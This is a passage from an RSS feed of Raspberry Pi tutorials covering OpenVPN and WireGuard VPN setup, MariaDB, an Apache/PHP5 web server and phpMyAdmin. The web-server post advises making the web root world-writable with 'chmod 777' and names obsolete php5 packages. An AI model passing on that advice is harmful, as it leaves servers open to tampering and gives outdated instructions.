``` &amp;nbsp;&lt;br /&gt;
Set up NAT: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
sudo apt install iptables-persistent -y&lt;br /&gt;
sudo netfilter-persistent save&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **7. Start OpenVPN** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo systemctl start openvpn@server&lt;br /&gt;
sudo systemctl enable openvpn@server&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **8. Create a client configuration** &amp;nbsp;&lt;br /&gt;
Create a file `client1.ovpn`: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
nano ~/client1.ovpn&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Paste in the following (substituting your own certificates): &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
client&lt;br /&gt;
dev tun&lt;br /&gt;
proto udp&lt;br /&gt;
remote YOUR_PUBLIC_IP 1194 &amp;nbsp;# Replace with the Pi's public IP&lt;br /&gt;
resolv-retry infinite&lt;br /&gt;
nobind&lt;br /&gt;
persist-key&lt;br /&gt;
persist-tun&lt;br /&gt;
remote-cert-tls server&lt;br /&gt;
cipher AES-256-CBC&lt;br /&gt;
verb 3&lt;br /&gt;
&amp;lt;ca&amp;gt;&lt;br /&gt;
[PASTE ca.crt CONTENTS HERE]&lt;br /&gt;
&amp;lt;/ca&amp;gt;&lt;br /&gt;
&amp;lt;cert&amp;gt;&lt;br /&gt;
[PASTE client1.crt CONTENTS HERE]&lt;br /&gt;
&amp;lt;/cert&amp;gt;&lt;br /&gt;
&amp;lt;key&amp;gt;&lt;br /&gt;
[PASTE client1.key CONTENTS HERE]&lt;br /&gt;
&amp;lt;/key&amp;gt;&lt;br /&gt;
&amp;lt;tls-auth&amp;gt;&lt;br /&gt;
[PASTE ta.key CONTENTS HERE]&lt;br /&gt;
&amp;lt;/tls-auth&amp;gt;&lt;br /&gt;
key-direction 1&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **Option 2: WireGuard on a Raspberry Pi** &amp;nbsp;&lt;br /&gt;
WireGuard is **faster and simpler** to set up. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Installation** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt install wireguard -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Generate keys** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
cd /etc/wireguard&lt;br /&gt;
sudo sh -c 'umask 077; wg genkey | tee privatekey | wg pubkey &amp;gt; publickey'&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Configure the server** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo nano /etc/wireguard/wg0.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Example: &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
[Interface]&lt;br /&gt;
Address = 10.0.0.1/24&lt;br /&gt;
PrivateKey = [YOUR_SERVER_PRIVATE_KEY]&lt;br /&gt;
ListenPort = 51820&lt;br /&gt;
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
&lt;br /&gt;
[Peer]&lt;br /&gt;
PublicKey = [CLIENT_PUBLIC_KEY]&lt;br /&gt;
AllowedIPs = 10.0.0.2/32&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
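&lt;br /&gt;
The steps above only cover the server side; for reference, the matching client-side config (with placeholder keys and endpoint) might look like this: &amp;nbsp;&lt;br /&gt;

```ini
[Interface]
# Client address; must match AllowedIPs in the server's [Peer] section
Address = 10.0.0.2/32
PrivateKey = [CLIENT_PRIVATE_KEY]
DNS = 8.8.8.8

[Peer]
PublicKey = [SERVER_PUBLIC_KEY]
Endpoint = YOUR_PUBLIC_IP:51820
# 0.0.0.0/0 routes all client traffic through the tunnel
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 25
```

On the client, save this as `/etc/wireguard/wg0.conf` and bring the tunnel up with `wg-quick up wg0`. &amp;nbsp;&lt;br /&gt;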
&lt;br /&gt;
### **Start it** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo systemctl enable wg-quick@wg0&lt;br /&gt;
sudo systemctl start wg-quick@wg0&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **Final steps (for both methods)** &amp;nbsp;&lt;br /&gt;
1. **Port forwarding** – forward **UDP 1194 (OpenVPN)** or **UDP 51820 (WireGuard)** on your router. &amp;nbsp;&lt;br /&gt;
2. **Dynamic DNS** (if you have a dynamic IP) – use **No-IP** or **DuckDNS**. &amp;nbsp;&lt;br /&gt;
3. **Connect from clients** – use the matching client software for each device. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Conclusion** &amp;nbsp;&lt;br /&gt;
- **OpenVPN**: Works with **almost any device**, but is more complex to set up. &amp;nbsp;&lt;br /&gt;
- **WireGuard**: **Faster** and simpler, ideal for **mobile devices**. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;**Done!** Your Raspberry Pi is now a **VPN server**, giving you secure browsing and remote access to your network. </description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/67/how-to-use-raspberry-pi-for-vpn</guid>
<pubDate>Tue, 25 Mar 2025 20:59:26 +0000</pubDate>
</item>
<item>
<title>How to Install MariaDB on Raspberry Pi?</title>
<link>https://asky.uk/66/how-to-install-mariadb-on-raspberry-pi</link>
<description>&lt;h3 class="wp-block-heading"&gt;Install MariaDB server&lt;/h3&gt;&lt;p&gt;As said in the introduction, MariaDB is available in the Raspberry Pi OS repository, so the installation is straightforward. Open a terminal (or connect via SSH) and follow the instructions:&lt;/p&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;As always, &lt;strong&gt;start by updating your system&lt;/strong&gt;:&lt;br&gt;&lt;code&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;/div&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;Then you can &lt;strong&gt;install MariaDB&lt;/strong&gt; with this command:&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;code&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sudo apt install mariadb-server&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;&lt;strong&gt;Type “Y” and Enter to continue.&lt;/strong&gt;&lt;br&gt;After a few seconds, the installation process is complete and MariaDB is almost ready to use.&lt;/li&gt;&lt;/ul&gt;&lt;p data-slot-rendered-content="true"&gt;If you’ve noticed it, the installation of MariaDB has also installed the MariaDB client.&lt;br&gt;This will allow you to connect from the command line with:&lt;br&gt;&lt;code&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; mysql&lt;/code&gt;&lt;/p&gt;&lt;h3 class="wp-block-heading"&gt;Root access&lt;/h3&gt;&lt;p&gt;Here is how to define the password for the root user and start to use MariaDB:&lt;/p&gt;&lt;ul data-slot-rendered-content="true" class="wp-block-list"&gt;&lt;li&gt;&lt;strong&gt;Enter this command:&lt;/strong&gt;&lt;br&gt;&lt;code&gt;sudo mysql_secure_installation&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Press enter to continue&lt;/strong&gt; (no password by default).&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Press “Y” to switch &lt;/strong&gt;to unix_socket authentication.&lt;/li&gt;&lt;li&gt;Then &lt;strong&gt;type “Y” to set a new password, and enter the password of your 
choice&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;Now &lt;strong&gt;press “Y” three more times&lt;/strong&gt; to:&lt;/li&gt;&lt;li&gt;remove anonymous users,&lt;/li&gt;&lt;li&gt;disallow remote root login,&lt;/li&gt;&lt;li&gt;and remove the test database.&lt;/li&gt;&lt;li&gt;Finally, &lt;strong&gt;press “Y” again to reload the privileges.&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/66/how-to-install-mariadb-on-raspberry-pi</guid>
<pubDate>Mon, 24 Mar 2025 21:31:59 +0000</pubDate>
</item>
<item>
<title>Web server on any Raspberry Pi?</title>
<link>https://asky.uk/2/web-server-on-any-raspberry-pi</link>
<description>&lt;p&gt;Now you have to install a web server on the Raspberry Pi. The easiest is the Apache server (Lighttpd also works if you are looking for something lighter). Run the following commands to install Apache, PHP5, and the PHP5 module for Apache (MySQL comes later if you are planning to use a CMS or a database).&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo apt-get update&lt;br&gt;&lt;br&gt;sudo apt-get install apache2 php5 libapache2-mod-php5&lt;/strong&gt;&lt;br&gt;&lt;br&gt;Now you should allow overrides by editing the 000-default file. You can do that with the following command:&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo nano /etc/apache2/sites-enabled/000-default&lt;/strong&gt;&lt;br&gt;&lt;br&gt;Now edit the following line:&lt;br&gt;&lt;br&gt;change "&lt;strong&gt;AllowOverride None&lt;/strong&gt;" to "&lt;strong&gt;AllowOverride All&lt;/strong&gt;".&lt;br&gt;&lt;br&gt;Now execute&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo service apache2 restart&lt;/strong&gt;&lt;br&gt;&lt;br&gt;to restart Apache with your new settings.&lt;br&gt;&lt;br&gt;Your site should now be up and running. Go to /var/ and change the permissions on www, making it writable:&lt;br&gt;&lt;br&gt;&lt;strong&gt;cd /var/&lt;br&gt;sudo chmod 777 www&lt;/strong&gt;&lt;br&gt;&lt;br&gt;This will let you log in using &lt;a href="http://winscp.net/eng/index.php" rel="nofollow noopener noreferrer"&gt;WinSCP&lt;/a&gt;&amp;nbsp;and upload HTML pages to your new site. Open the browser on your PC and point it to 192.168.xx.xx (the IP address of your Raspberry Pi) to view the default page.&lt;br&gt;&lt;br&gt;You can also install an SQL server using the following command; with &lt;strong&gt;PHP&lt;/strong&gt; and &lt;strong&gt;SQL&lt;/strong&gt; running on your server you can host a CMS like Drupal.&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo apt-get install mysql-server mysql-client php5-mysql&lt;/strong&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/2/web-server-on-any-raspberry-pi</guid>
<pubDate>Wed, 19 Mar 2025 08:24:05 +0000</pubDate>
</item>
<item>
<title>How to install phpmyadmin in Raspberry Pi?</title>
<link>https://asky.uk/1/how-to-install-phpmyadmin-in-raspberry-pi</link>
<description>&lt;p&gt;&lt;strong class="step_numbering"&gt;1.&lt;/strong&gt;&amp;nbsp;To install the PHPMyAdmin package on our Raspberry Pi, we have to run the command below.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo apt install phpmyadmin&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;2.&lt;/strong&gt;&amp;nbsp;Select the “&lt;strong&gt;apache2&lt;/strong&gt;” option by pressing&amp;nbsp;&lt;strong&gt;SPACE&lt;/strong&gt;&amp;nbsp;and then&amp;nbsp;&lt;strong&gt;ENTER&lt;/strong&gt;. Select this option even if you are using NGINX, as we will configure that ourselves later on.&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;3.&lt;/strong&gt;&amp;nbsp;Next, we will need to configure PHPMyAdmin to connect to our MySQL server. We will also need to set up some details so that we can log in to the PHPMyAdmin software.&lt;/p&gt;&lt;p&gt;To do this, select “&lt;strong&gt;&amp;lt;Yes&amp;gt;&lt;/strong&gt;” at the next prompt.&lt;/p&gt;&lt;p&gt;&lt;img src="https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup.png" alt="Raspbian PHPMyAdmin setup"&gt;&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;4.&lt;/strong&gt; Set a password for PHPMyAdmin itself. It is best to set this password to something different from your root SQL password. 
Doing this will help secure the server.&lt;/p&gt;&lt;p&gt;This password is what PHPMyAdmin will use to connect to the MySQL server.&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;5.&lt;/strong&gt; Create a new user:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo mysql -u root -p&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;6.&lt;/strong&gt; Run the command below to create a user and permit it to access all databases.&lt;/p&gt;&lt;p&gt;Make sure you replace “&lt;strong&gt;username&lt;/strong&gt;” with the&amp;nbsp;&lt;strong&gt;username of your choice&lt;/strong&gt;, and “&lt;strong&gt;password&lt;/strong&gt;” with a&amp;nbsp;&lt;strong&gt;secure password&lt;/strong&gt; of your choice.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;GRANT ALL PRIVILEGES ON *.* TO 'username'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;7.&lt;/strong&gt;&amp;nbsp;You can exit the MySQL command-line interface by typing “&lt;strong&gt;quit&lt;/strong&gt;” in the terminal.&lt;/p&gt;&lt;p&gt;Once done, you can proceed to configure PHPMyAdmin for Apache or NGINX, then access your Raspberry Pi’s PHPMyAdmin interface at:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;http://localhost/phpmyadmin&lt;/code&gt;&lt;/pre&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/1/how-to-install-phpmyadmin-in-raspberry-pi</guid>
<pubDate>Tue, 18 Mar 2025 21:44:37 +0000</pubDate>
</item>
</channel>
</rss>